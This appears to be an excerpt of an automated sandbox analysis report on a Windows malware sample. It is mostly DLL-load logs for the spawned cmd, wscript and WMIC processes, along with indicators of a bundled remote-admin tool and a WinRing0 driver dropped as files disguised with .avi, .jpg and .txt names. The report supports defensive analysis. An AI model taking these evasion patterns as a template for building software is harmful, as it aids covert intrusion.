                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\find.exeSection loaded: ulib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\find.exeSection loaded: fsutilext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: policymanager.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: pcacli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vbscript.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: vcruntime140.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: amsi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: userenv.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: profapi.dll
                            Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: version.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Users\user\Desktop\K4gsPJGEi4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeFile written: C:\Users\user\AppData\Local\Temp\config.iniJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: K4gsPJGEi4.exeStatic file information: File size 13410304 > 1048576
                            Source: K4gsPJGEi4.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcb3a00
                            Source: Binary string: aeroadmin.pdb source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr
                            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: K4gsPJGEi4.exe, Ri.avi.15.dr, WinRing0x64.sys0.15.dr, WinRing0x64.sys.15.dr, WinRing0x64.txt.0.dr
                            Source: Binary string: aeroadmin.pdbXu source: K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.dr
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004044CF LoadLibraryA,GetProcAddress,18_2_004044CF
                            Source: sc.avi.15.drStatic PE information: real checksum: 0x0 should be: 0x18b14
                            Source: Sy.avi.15.drStatic PE information: real checksum: 0x11186a should be: 0x107332
                            Source: Systemfo.jpg.15.drStatic PE information: real checksum: 0x11186a should be: 0x107332
                            Source: Systemfont.exe.15.drStatic PE information: real checksum: 0x11186a should be: 0x107332
                            Source: Systemfont.txt.0.drStatic PE information: real checksum: 0x11186a should be: 0x107332
